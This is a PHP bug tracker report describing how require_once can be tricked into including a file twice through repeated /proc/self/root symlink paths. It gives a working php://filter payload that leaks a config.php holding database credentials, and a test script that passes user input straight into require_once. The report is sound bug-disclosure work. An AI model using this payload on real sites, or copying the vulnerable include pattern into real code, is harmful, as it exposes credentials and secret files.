php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #79980 require_once can include a file twice via symlink loops
Submitted: 2020-08-16 05:18 UTC Modified: -
Votes:1
Avg. Score:3.0 ± 0.0
Reproduced:0 of 1 (0.0%)
From: i at littlefisher dot me Assigned:
Status: Open Package: *Directory/Filesystem functions
PHP Version: 7.2.33 OS: Ubuntu18.04
Private report: No CVE-ID: None
View Add Comment Developer Edit
Welcome! If you don't have a Git account, you can't do anything here.
You can add a comment by following this link or if you reported this bug, you can edit this bug over here.
(description)
Block user comment
Status: Assign to:
Package:
Bug Type:
Summary:
From: i at littlefisher dot me
New email:
PHP Version: OS:

 

 [2020-08-16 05:18 UTC] i at littlefisher dot me
Description:
------------
Normally, when we include a file via `require_once()` which has included before, PHP will prevent this behavior.

But when we set the file path to a symbol link, PHP will be fooled. An example in Test script as follows can demonstrate it. And assume there is some secret in `config.php`.

We can pass our payload to `content` query parameter, and then the PHP will resolve the file path to '/proc/24273/root/proc/self/root/var/www/html/config.php'.

Eventually, the `require_once` bypassed. We got the base64-encoded content of `config.php`.

Payload:

php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/config.php

Test script:
---------------
/* index.php */
<?php
error_reporting(E_ALL);
require_once('config.php');
highlight_file(__FILE__);
if(isset($_GET['content'])) {
    $content = $_GET['content'];
    require_once($content);
} 
/* config.php */
<?php
$MYSQL_HOST = '127.0.0.1';
$MYSQL_PORT = 3306;
$MYSQL_USERNAME = 'admin';
$MYSQL_PASSWORD = 'admin';

Expected result:
----------------
Excepted result is `config.php` cannot be included twice by the recursive symbollink.


Patches

Add a Patch

Pull Requests

Add a Pull Request

 
PHP Copyright © 2001-2020 The PHP Group
All rights reserved.
Last updated: Mon Oct 26 02:01:23 2020 UTC